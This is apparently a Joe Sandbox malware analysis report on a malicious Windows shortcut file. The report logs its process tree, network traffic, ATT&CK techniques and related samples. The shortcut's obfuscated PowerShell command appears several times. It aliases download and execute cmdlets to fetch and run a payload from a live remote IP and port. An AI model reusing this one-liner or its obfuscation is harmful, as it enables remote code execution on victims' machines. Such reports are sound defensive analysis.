Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3598Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6219Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252Thread sleep count: 3598 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6252Thread sleep count: 6219 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5876Thread sleep time: -15679732462653109s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 368Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
PowerShell
1
DLL Side-Loading
11
Process Injection
1
Masquerading
OS Credential Dumping11
Process Discovery
Remote ServicesData from Local System11
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
21
Virtualization/Sandbox Evasion
LSASS Memory21
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture11
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets11
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1568476 Sample: EzE0GqgjU0.lnk Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 16 Antivirus detection for URL or domain 2->16 18 Windows shortcut file (LNK) starts blacklisted processes 2->18 20 Multi AV Scanner detection for submitted file 2->20 22 9 other signatures 2->22 6 cmd.exe 1 2->6         started        process3 signatures4 24 Windows shortcut file (LNK) starts blacklisted processes 6->24 26 Suspicious powershell command line found 6->26 28 PowerShell case anomaly found 6->28 9 powershell.exe 14 16 6->9         started        12 conhost.exe 1 6->12         started        process5 dnsIp6 14 95.169.201.100, 18960, 49709, 49752 GOBULNETBG Bulgaria 9->14

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
EzE0GqgjU0.lnk24%ReversingLabsWin32.Trojan.Boxter
EzE0GqgjU0.lnk100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://95.169.201.100:18960/uploads/team-1/readme.txt)0%Avira URL Cloudsafe
http://95.169.201.100:18960/uploads/team-1/readme.txt100%Avira URL Cloudmalware

Download Network PCAP: filteredfull

No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://95.169.201.100:18960/uploads/team-1/readme.txttrue
  • Avira URL Cloud: malware
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://95.169.201.100:18960/uploads/team-1/readme.txt)EzE0GqgjU0.lnktrue
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
95.169.201.100
unknownBulgaria
41017GOBULNETBGtrue
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1568476
Start date and time:2024-12-04 16:49:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 52s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:EzE0GqgjU0.lnk
renamed because original name is a hash value
Original Sample Name:9c7e3396ea85258017f63420a73ff3bf8be2c108b09dbbeb26237bfa3c3f549e.lnk
Detection:MAL
Classification:mal100.troj.winLNK@4/4@0/1
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .lnk
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • VT rate limit hit for: EzE0GqgjU0.lnk
TimeTypeDescription
10:50:03API Interceptor582x Sleep call for process: powershell.exe modified
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
95.169.201.100rim2HzF9qx.lnkGet hashmaliciousUnknownBrowse
  • 95.169.201.100:18956/api/secure/98d578acc14ad4fa74fea36dedb81fa4
dlAJGVJAQ3.lnkGet hashmaliciousUnknownBrowse
  • 95.169.201.100:18956/api/secure/724c9e6bee4672b1d09c7e48c0bda44a
FzJh43Lpcs.lnkGet hashmaliciousUnknownBrowse
  • 95.169.201.100:18956/api/secure/6064b1695dc125e6fe96e1c31d0fb5d7
Lfk3xTOHyh.lnkGet hashmaliciousUnknownBrowse
  • 95.169.201.100:18956/api/secure/6e830590925e041c63e0b3005bdcdf12
1fZQojwhtS.lnkGet hashmaliciousUnknownBrowse
  • 95.169.201.100:18956/api/secure/0778f73cfc70bd6ecf1d098fa7504a53
sF5nNt8usL.batGet hashmaliciousUnknownBrowse
  • 95.169.201.100:18960/uploads/team-5/readme.exe
oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
  • 95.169.201.100:18960/uploads/test-1/readme.exe
9aTcxCmLgM.batGet hashmaliciousUnknownBrowse
  • 95.169.201.100:18960/uploads/team-4/readme.exe
4l5IFxl9t3.batGet hashmaliciousUnknownBrowse
  • 95.169.201.100:18960/uploads/team-3/readme.exe
B3N4x4meoJ.batGet hashmaliciousUnknownBrowse
  • 95.169.201.100:18960/uploads/test-2/readme.exe
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
GOBULNETBGrim2HzF9qx.lnkGet hashmaliciousUnknownBrowse
  • 95.169.201.100
dlAJGVJAQ3.lnkGet hashmaliciousUnknownBrowse
  • 95.169.201.100
FzJh43Lpcs.lnkGet hashmaliciousUnknownBrowse
  • 95.169.201.100
Lfk3xTOHyh.lnkGet hashmaliciousUnknownBrowse
  • 95.169.201.100
1fZQojwhtS.lnkGet hashmaliciousUnknownBrowse
  • 95.169.201.100
sF5nNt8usL.batGet hashmaliciousUnknownBrowse
  • 95.169.201.100
oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
  • 95.169.201.100
9aTcxCmLgM.batGet hashmaliciousUnknownBrowse
  • 95.169.201.100
4l5IFxl9t3.batGet hashmaliciousUnknownBrowse
  • 95.169.201.100
B3N4x4meoJ.batGet hashmaliciousUnknownBrowse
  • 95.169.201.100
No context
No context
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):9434
Entropy (8bit):4.928515784730612
Encrypted:false
SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5:D3594118838EF8580975DDA877E44DEB
SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious:false
Reputation:moderate, very likely benign file
Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1628158735648508
Encrypted:false
SSDEEP:3:Nlllul5mxllp:NllU4x/
MD5:3A925CB766CE4286E251C26E90B55CE8
SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
Malicious:false
Reputation:moderate, very likely benign file
Preview:@...e................................................@..........
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:high, very likely benign file
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
Entropy (8bit):4.572419998703764
TrID:
  • Windows Shortcut (20020/1) 100.00%
File name:EzE0GqgjU0.lnk
File size:1'596 bytes
MD5:162434f6a1f739dc14ac5c644019b34f
SHA1:0bd42f8aab9653eba62d40a5229f079f2fdbd741
SHA256:9c7e3396ea85258017f63420a73ff3bf8be2c108b09dbbeb26237bfa3c3f549e
SHA512:3f73352af12ce67a9841a1456f3c2014a02c2ea0262f12f2e3fc1076a50445c5195d1623160d1d7171aaee68022e95aeed1ee64c8c6f897faa602afb38e66a69
SSDEEP:48:8GIWax4PsU/mImzjp7DRIRMXv3SsgoQYk:8fWaxEs2mIOlDR2qvZg5Y
TLSH:F831C1252DD86734C2734E3B89BAF2418F26B915AD338FAE4150518D0C60604EC35F3F
File Content Preview:L..................F.... ....Q...A.......D.......A...l......................5....P.O. .:i.....+00.../C:\...................V.1......Y'...Windows.@........OwH.Y(...........................-...W.i.n.d.o.w.s.....Z.1......Y)...System32..B........OwH.YI.......
Icon Hash:74f4d4dcdcc9e1ed

General

Relative Path:..\..\..\..\Windows\System32\cmd.exe
Command Line Argument:/c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Icon location:%SystemRoot%\System32\SHELL32.dll

Download Network PCAP: filteredfull

TimestampSource PortDest PortSource IPDest IP
Dec 4, 2024 16:50:04.843372107 CET4970918960192.168.2.695.169.201.100
Dec 4, 2024 16:50:04.965405941 CET189604970995.169.201.100192.168.2.6
Dec 4, 2024 16:50:04.965595007 CET4970918960192.168.2.695.169.201.100
Dec 4, 2024 16:50:04.969410896 CET4970918960192.168.2.695.169.201.100
Dec 4, 2024 16:50:05.089248896 CET189604970995.169.201.100192.168.2.6
Dec 4, 2024 16:50:26.857391119 CET189604970995.169.201.100192.168.2.6
Dec 4, 2024 16:50:26.857517958 CET4970918960192.168.2.695.169.201.100
Dec 4, 2024 16:50:26.867866039 CET4970918960192.168.2.695.169.201.100
Dec 4, 2024 16:50:26.870892048 CET4975218960192.168.2.695.169.201.100
Dec 4, 2024 16:50:26.987740040 CET189604970995.169.201.100192.168.2.6
Dec 4, 2024 16:50:26.990714073 CET189604975295.169.201.100192.168.2.6
Dec 4, 2024 16:50:26.990866899 CET4975218960192.168.2.695.169.201.100
Dec 4, 2024 16:50:26.991156101 CET4975218960192.168.2.695.169.201.100
Dec 4, 2024 16:50:27.110908031 CET189604975295.169.201.100192.168.2.6
Dec 4, 2024 16:50:48.904175043 CET189604975295.169.201.100192.168.2.6
Dec 4, 2024 16:50:48.904405117 CET4975218960192.168.2.695.169.201.100
Dec 4, 2024 16:50:48.904813051 CET4975218960192.168.2.695.169.201.100
Dec 4, 2024 16:50:49.024718046 CET189604975295.169.201.100192.168.2.6
  • 95.169.201.100:18960
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.64970995.169.201.100189602548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Dec 4, 2024 16:50:04.969410896 CET190OUTGET /uploads/team-1/readme.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: 95.169.201.100:18960
Connection: Keep-Alive


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1192.168.2.64975295.169.201.100189602548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Dec 4, 2024 16:50:26.991156101 CET190OUTGET /uploads/team-1/readme.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: 95.169.201.100:18960
Connection: Keep-Alive


050100s020406080100

Click to jump to process

050100s0.0020406080MB

Click to jump to process

  • File
  • Registry

Click to dive into process behavior distribution

Target ID:1
Start time:10:50:01
Start date:04/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Imagebase:0x7ff793370000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:2
Start time:10:50:01
Start date:04/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

Target ID:3
Start time:10:50:01
Start date:04/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18960/uploads/team-1/readme.txt)
Imagebase:0x7ff6e3d50000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

No disassembly